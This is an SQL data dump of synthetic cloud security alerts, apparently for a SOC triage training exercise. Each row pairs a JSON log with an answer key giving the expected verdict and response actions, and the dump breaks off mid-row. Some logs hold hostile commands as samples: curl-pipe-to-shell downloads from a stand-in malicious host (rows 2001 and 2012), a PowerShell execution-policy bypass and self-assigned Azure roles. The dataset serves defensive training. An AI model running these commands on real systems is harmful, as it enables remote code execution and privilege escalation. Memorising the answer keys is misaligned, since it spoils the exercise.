(1997, 'Wiz: Unauthorized Serverless Function Execution', 'medium', 'Wiz', 'An unauthorized execution of a serverless function was detected, potentially leading to data exposure.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"aws.lambda.com\",\"request_body\":\"\",\"command_line\":\"node handler.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized AWS Lambda executions\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"node handler.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Execution of a potentially unauthorized serverless script\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"True positive due to unauthorized execution of a serverless function from a known malicious IP.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(1998, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access to an S3 bucket was detected originating from an external IP address. Sensitive data may have been exfiltrated.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T22:34:12Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unauthorized_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data.zip HTTP/1.1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username used in previous unauthorized access attempts\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.zip HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Suspicious download attempt from S3 bucket\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP was involved in unauthorized access, matching OSINT findings for malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(1999, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An internal account attempted to gain higher privileges using a compromised token, indicating possible credential theft.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T18:46:52Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"jdoe\",\"hostname\":\"azurevm01\",\"command_line\":\"az role assignment create --assignee jdoe --role contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User associated with suspicious privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee jdoe --role contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in unauthorized privilege escalation attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command attempted by the internal user is consistent with privilege escalation behavior.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2000, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Anomalous activity detected from a service account, indicating possible hijacking with unauthorized API calls.', 'Lateral Movement', 'T1098', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T02:08:23Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.15\",\"username\":\"svc-account\",\"hostname\":\"gcp-project-1\",\"request_body\":\"POST /v1/projects/service-accounts:signJwt\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"svc-account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account used in unauthorized actions\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"POST /v1/projects/service-accounts:signJwt\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Unauthorized JWT signing request detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized API call is a clear indication of service account hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2001, 'Prisma Cloud Kubernetes Pod Compromise', 'high', 'Prisma Cloud', 'Anomalous process execution detected within a Kubernetes pod, indicating possible compromise and lateral movement.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:11:09Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.1.2.3\",\"dst_ip\":\"10.1.2.4\",\"username\":\"kube-system\",\"hostname\":\"kube-pod-01\",\"command_line\":\"curl http://malicious-site.com/malware.sh | sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com/malware.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution indicative of malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/malware.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious scripts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command executed within the pod is consistent with compromise attempt patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2002, 'Wiz Serverless Function Abnormal Invocation', 'medium', 'Wiz', 'A serverless function was triggered by an unexpected source IP, suggesting possible unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:33Z\",\"event_type\":\"process_execution\",\"src_ip\":\"172.16.0.2\",\"dst_ip\":\"172.16.0.3\",\"username\":\"lambda-function\",\"hostname\":\"aws-lambda-01\",\"command_line\":\"python3 handler.py invoke\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.16.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python3 handler.py invoke\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual invocation of serverless function\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"lambda-function\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Lambda function invoked under suspicious circumstances\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unexpected source of function invocation aligns with unauthorized access patterns.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2003, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Unusual access pattern detected on an S3 bucket. Data exfiltration attempt suspected from an external IP address.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"s3_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data\",\"command_line\":\"aws s3 cp s3://bucket-name/sensitive-data .\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 134 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account accessed S3 bucket\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"aws s3 cp s3://bucket-name/sensitive-data .\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious command-line execution for data copy\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP involved in data exfiltration from AWS S3 bucket, indicating a true positive data leak.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2004, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'Anomalous activity detected: Unauthorized role assignment to a user account with potentially escalated privileges.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:47:45Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"azure.com\",\"request_body\":\"RoleAssignment: Contributor\",\"command_line\":\"az role assignment create --assignee user@example.com --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account associated with privilege escalation attempts\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee user@example.com --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential unauthorized privilege escalation command\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The assignment of elevated roles without authorization is a clear indicator of privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2005, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'Suspicious activity detected from a compromised service account, indicating potential hijacking and misuse.', 'Credential Attack', 'T1530', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:23:10Z\",\"event_type\":\"service_account_activity\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.1.1.2\",\"username\":\"compromised_service_account\",\"hostname\":\"gcp.google.com\",\"request_body\":\"Accessing cloud storage buckets\",\"command_line\":\"gcloud auth activate-service-account --key-file=compromised-key.json\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to unauthorized service account activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account potentially compromised and misused\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=compromised-key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of service account activation command with compromised credentials\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Service account hijacking attempts confirmed by unauthorized access and command execution.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2006, 'Kubernetes API Access from Unauthorized IP', 'high', 'Prisma Cloud', 'Detected access to Kubernetes API from an IP not whitelisted, potentially indicating a reconnaissance attempt.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:32:20Z\",\"event_type\":\"api_access\",\"src_ip\":\"203.0.113.88\",\"dst_ip\":\"192.168.10.15\",\"username\":\"kube_admin\",\"hostname\":\"k8s_api_server\",\"request_body\":\"GET /api/v1/namespaces/default/pods\",\"command_line\":\"kubectl get pods --namespace default\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"kube_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Admin user account accessing Kubernetes API\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"kubectl get pods --namespace default\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Suspicious command potentially used for reconnaissance\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized IP accessing Kubernetes API suggests potential lateral movement within the network.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2007, 'Potential Serverless Function Exploitation', 'medium', 'Wiz', 'Detected unusual execution pattern in serverless function, potentially indicating exploitation.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:50:00Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.2.3.4\",\"username\":\"lambda_function\",\"hostname\":\"aws_lambda\",\"request_body\":\"POST /run-function\",\"command_line\":\"node exploit.js\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple serverless function exploitations\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"lambda_function\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Lambda function execution detected\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"node exploit.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Execution of potentially malicious JavaScript code\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Malicious IP executing unusual patterns in serverless function indicates potential exploitation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2008, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized external IP accessed sensitive files in an S3 bucket, indicating a potential data exfiltration attempt.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T05:45:00Z\",\"event_type\":\"access_denied\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"N/A\",\"username\":\"external_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive_data/file1.csv HTTP/1.1\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 125 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"external_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in organization\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"s3.amazonaws.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate AWS service\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"External IP accessing sensitive data indicates a clear data exfiltration attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2009, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An internal user account attempted unauthorized privilege escalation using PowerShell scripts.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.8\",\"username\":\"jdoe\",\"hostname\":\"azure-vm-01\",\"request_body\":\"N/A\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\escalate.ps1\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the organization\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -ExecutionPolicy Bypass -File C:\\\\scripts\\\\escalate.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Script identified as malicious for privilege escalation\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected for this user\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of PowerShell scripts for privilege escalation is a strong indicator of a lateral movement attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2010, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'Unauthorized use of a service account was detected, possibly indicating hijacking and subsequent misuse.', 'Credential Attack', 'T1528', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"35.192.0.2\",\"username\":\"service-account@project.iam.gserviceaccount.com\",\"hostname\":\"gcp-instance-1\",\"request_body\":\"N/A\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account being used in unauthorized context\"}},{\"id\":\"artifact_3\",\"type\":\"hostname\",\"value\":\"gcp-instance-1\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate GCP instance\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unauthorized access attempts using a service account indicate possible hijacking.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2011, 'Prisma Cloud Unauthorized IAM Role Creation', 'high', 'Prisma Cloud', 'A new IAM role was created without proper authorization, suggesting a potential privilege escalation attempt.', 'Credential Attack', 'T1098', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:05:00Z\",\"event_type\":\"role_creation\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"N/A\",\"username\":\"admin_user\",\"hostname\":\"prisma-cloud-instance\",\"request_body\":\"CreateRole: {\\\"RoleName\\\": \\\"AdminAccess\\\", \\\"Permissions\\\": \\\"*\\\"}\",\"command_line\":\"N/A\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in role creation\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual role creation activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"CreateRole: {\\\"RoleName\\\": \\\"AdminAccess\\\", \\\"Permissions\\\": \\\"*\\\"}\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload indicates attempt to grant excessive permissions\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Creating roles with excessive permissions without authorization is indicative of privilege escalation.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2012, 'Wiz Kubernetes Cluster Compromise Detected', 'critical', 'Wiz', 'Suspicious activity detected involving the execution of unauthorized commands on a Kubernetes cluster node.', 'Lateral Movement', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"192.168.2.11\",\"username\":\"k8s-node-user\",\"hostname\":\"k8s-cluster-node-3\",\"request_body\":\"N/A\",\"command_line\":\"kubectl exec -- /bin/sh -c \'curl http://malicious-site.com/exploit.sh | sh\'\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address within Kubernetes cluster\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec -- /bin/sh -c \'curl http://malicious-site.com/exploit.sh | sh\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command execution involves downloading and executing a remote script\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"k8s-node-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"User account activity inconsistent with normal operations\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The execution of unauthorized commands on a Kubernetes node suggests a compromise and lateral movement attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2013, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An S3 bucket was accessed from an unfamiliar IP address, and data was exfiltrated. The access pattern matches known data exfiltration behavior.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T04:45:00Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"198.51.100.10\",\"username\":\"s3_admin\",\"hostname\":\"aws-s3-bucket\",\"request_body\":\"GET /secret-data.txt HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"s3_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal AWS account used for regular operations\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /secret-data.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Unusual access pattern detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP has a history of malicious activity and accessed sensitive data, confirming a true positive for data exfiltration.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2014, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'A potential privilege escalation was detected in Azure IAM. A user attempted to assign themselves admin roles.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:15:00Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"regular_user\",\"hostname\":\"azure-ad\",\"request_body\":\"\",\"command_line\":\"az role assignment create --assignee regular_user --role Contributor\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"regular_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual privilege escalation attempt by a non-admin user\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"az role assignment create --assignee regular_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates an attempt to escalate privileges\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of admin-level commands by a regular user from a suspicious IP indicates a true positive for 